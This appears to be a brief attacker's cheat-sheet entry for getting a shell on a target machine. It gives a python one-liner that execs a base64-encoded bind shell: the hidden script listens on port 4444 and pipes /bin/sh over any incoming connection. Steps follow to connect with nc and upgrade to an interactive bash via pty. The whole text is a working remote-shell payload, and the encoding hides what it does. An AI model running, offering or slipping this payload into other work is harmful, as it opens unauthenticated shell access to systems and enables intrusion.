- Start bind.py on the target.
python -c 'import base64;exec(base64.b64decode("IAppbXBvcnQgc3VicHJvY2VzcwppbXBvcnQgc29ja2V0CmltcG9ydCBvcwppbXBvcnQgdGhyZWFkaW5nCmltcG9ydCB0aW1lCgpIT1NUID0gJzAuMC4wLjAnClBPUlQgPSA0NDQ0CgpzID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQoKcy5iaW5kKChIT1NULCBQT1JUKSkKCnMubGlzdGVuKDEpCnByaW50KGYiWypdIExpc3RlbmluZyBvbiB7SE9TVH06e1BPUlR9IikKCmNvbm4sIGFkZHIgPSBzLmFjY2VwdCgpCnByaW50KGYiWypdIENvbm5lY3Rpb24gZnJvbToge2FkZHJbMF19OnthZGRyWzFdfSIpCgpwcm9jID0gc3VicHJvY2Vzcy5Qb3BlbihbJy9iaW4vc2gnXSwgc3RkaW49c3VicHJvY2Vzcy5QSVBFLCBzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLCBzdGRlcnI9c3VicHJvY2Vzcy5QSVBFLCBzaGVsbD1UcnVlKQoKZGVmIHJlYWRfZnJvbV9zdWJwcm9jZXNzX2FuZF93cml0ZV90b19zb2NrZXQocHJvYywgY29ubik6CiAgICB3aGlsZSBUcnVlOgogICAgICAgIG91dHB1dCA9IHByb2Muc3Rkb3V0LnJlYWQoMSkKICAgICAgICBpZiBub3Qgb3V0cHV0OgogICAgICAgICAgICBicmVhawogICAgICAgIGNvbm4uc2VuZChvdXRwdXQpCgpkZWYgcmVhZF9mcm9tX3NvY2tldF9hbmRfd3JpdGVfdG9fc3VicHJvY2Vzcyhjb25uLCBwcm9jKToKICAgIHdoaWxlIFRydWU6CiAgICAgICAgZGF0YSA9IGNvbm4ucmVjdigxMDI0KQogICAgICAgIGlmIG5vdCBkYXRhOgogICAgICAgICAgICBicmVhawogICAgICAgIHByb2Muc3RkaW4ud3JpdGUoZGF0YSkKICAgICAgICBwcm9jLnN0ZGluLmZsdXNoKCkKCnRocmVhZGluZy5UaHJlYWQodGFyZ2V0PXJlYWRfZnJvbV9zdWJwcm9jZXNzX2FuZF93cml0ZV90b19zb2NrZXQsIGFyZ3M9KHByb2MsIGNvbm4pKS5zdGFydCgpCnRocmVhZGluZy5UaHJlYWQodGFyZ2V0PXJlYWRfZnJvbV9zb2NrZXRfYW5kX3dyaXRlX3RvX3N1YnByb2Nlc3MsIGFyZ3M9KGNvbm4sIHByb2MpKS5zdGFydCgpCgo="))'
- Connect using nc to target
- Run the following command on terminal
python -c 'import pty; pty.spawn("/bin/bash")'